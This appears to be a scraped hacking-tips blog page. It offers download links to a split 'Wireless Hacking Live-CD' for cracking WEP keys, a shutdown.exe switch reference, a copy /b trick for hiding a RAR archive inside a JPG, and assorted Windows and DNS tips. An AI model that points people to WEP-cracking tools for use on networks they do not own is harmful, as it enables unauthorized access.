5)connect using wep key.

Note: if you have problems burning the ISO, convert the ISO using Magic ISO to nrg image, before burning.

Size : 626 MB(6X100+26)




Code:
Download Wireless Hacking Live-CD.part1.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part2.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part3.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part4.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part5.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part6.rar, upload your files and earn money.

Download Wireless Hacking Live-CD.part7.rar, upload your files and earn money.


OR


Code:
http://letitbit.net/download/1153f44...part1.rar.html

http://letitbit.net/download/b249be9...part2.rar.html

letitbit net - this is totally free file hosting. The speed and size of files is no limited.

letitbit net - this is totally free file hosting. The speed and size of files is no limited.

http://letitbit.net/download/6e7b358...part5.rar.html

http://letitbit.net/download/a1d4bd4...part6.rar.html

http://letitbit.net/download/6f054e3...part7.rar.html

Did you know that in Windows XP you can shut down your computer from the (eventually DOS prompt) command line box? Moreover, you can do this by clicking your mouse only once.



All you need to do is... right-click on an empty Desktop spot -> select New -> Shortcut -> type shutdown followed by a space, and then enter one or more of the parameters listed below -> click Next -> type a suggestive name for your new shortcut -> finally, click Finish.


This is the Shutdown.exe (located in %systemroot%\System32, usually C:\Windows\System32) syntax:


shutdown [-i|-l|-s|-r|-a] [-f] [-m \\computername] [-t xx] [-c "Text"] [-d[u][p]:xx:yy]>

Valid command line switches:

-a = Abort system shutdown in progress ONLY IF the -t xx timeout option was already set to ANY value other than 0. ALL switches except -l and -m are ignored during abort.

-c "Text" = Text comment (case insensitive) to be displayed in the Message area of the System Shutdown window. MUST be enclosed between quotes. Maximum allowed 127 ASCII characters.

-d [u][p]:xx:yy = Reason code for shutdown:
u = User code.
p = Planned shutdown code.
xx = Major reason code. Positive integer number less than 256.
yy = Minor reason code. Positive integer number less than 65536.

-f = Force running applications to close without warning.

-i = Display the shutdown interface (GUI). MUST be the first option!

-l = Log off the current user of the local computer (default action). Can NOT be used with the -m option unless the current user has Sysadmin rights, in which case the -m switch takes precedence.
-m \\computername = Remote/network computer name (most always case sensitive) to log off/restart/shut down. Current user MUST have Sysadmin rights to be allowed to use this switch!

-s = Shut down the local computer.

-r = Shut down and restart (reboot) the local computer.

-t xx = Set shutdown timer to timeout for xx seconds. IF NOT specified defaults to 20 seconds. Allowed values between 0 and 99 seconds. The -a switch is the ONLY one that CAN be used during the timeout period.

NOTES:
The dash (-) in front of these switches can be replaced by a forward slash (/).

Spaces are NOT required to separate the shutdown command from ANY following switches, but ARE required to separate ANY switch from its following parameter(s), if any.
For example:

shutdown -s -c "Shutting down!" -t 3

tells your computer to shutdown after waiting for 3 seconds while the System Shutdown window will display text above in the Message area.

Optional: after you're done creating your customized shortcut for shutdown -> right-click on it -> select Properties -> enter your desired key "combo" in the Shortcut Key box (e.g. Ctrl + Alt + End) -> click OK/Apply.
From now on just left-click on your shutdown shortcut or hit that key combination to turn off/restart/log off your computer.





Here is a tutorial on how to hide files in Jpg's. Please note it isn't the most secure method but it's still cool to play with. A simple solution to make this more secure, is to use encryption on the RAR file when your create it, but thats not the point of this tutorial :) The idea is to show how files can be 'slammed' together, to stop the average PC user from finding them. Step by Step Instructions You will need the following.. Windows 2000 / XP (probably Vista, too!) Basic Knowledge of the Command Prompt Winrar 1. Gather your image and the files you wish to lodge into it. Here I have a meeting.txt which which I will slap inside my picture secret.jpg . put the files inside folder hidden (eg.) as shown below
2. Add the files you want to hide into a new RAR archive eg. meeting.rar 3. Open Command Prompt by typing cmd in RUN and type the following command (this is just example . comand depends on where you create the file) >cd.. >cd.. >cd hidden >copy /b secret.jpg + meeting.rar lizard.jpg where secret.jpg is the original picture, meeting.rar is the file to be hidden, and lizard.jpg is the file which contains both. as shown below 4 . so the new picture lizard.jpg which contained the hidden file is created

When you view the picture you will see only the picture (not the hidden file). To see the the hidden file inside the picture change the file extension from .jpg to .rar and extract it. You can use this method to hide some files from average user.


To change the name of the Recycle Bin desktop icon, open Regedit and go to:

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
and change the name "Recycle Bin" to whatever you want (don't type any quotes).

You have Mouse Problem ?? No Problem

I will give you suggestion

Press Left Alt + Left Shift + Num Lock Button + Ok

with the help of Numeric Keypad e.g ( Press and Hold the following Keys )

7   8    9

4 6

1 2 3


For Normal Click Press
5

Default

Left Alt
+ Left Shift + Num Lock

Tip 1: One of the major problems with BSNL Dataone Broadband connection is the DNS servers they provide by default. Most of the time they are very slow and sometimes they fail to respond. I noticed that I am starting to spend a significant amount of time in DNS resolution with Dataone connection, often it is larger than the time it takes to actually get the reponse. Here is a simple solution to significantly speed up your DNS resolution. Open up the network connection profile and edit TCP/IP settings. In the DNS server address fields, specify the following DNS server addresses: 208.67.222.222 and 208.67.220.220
Disconnect the connection and then connect again. You are done. This specifies third party DNS servers which are significantly faster than BSNL Dataone’s DNS servers. Note: The service is provided by OpenDNS.

Tip 2: Firefox users can use FlashBlock extension to prevent downloading of Flash content by default, thereby significantly speeding up browsing experience. You can click on the placeholder icon to display the original Flash content any time. This is more of a passive tip in that reduces data usage to improve your overall experience.

Counter

Followers

Subscribe Via Email &Sms

Enter your email address:

Expert Hackers

Also Subscribe Via Sms Just click here to follow via
SMS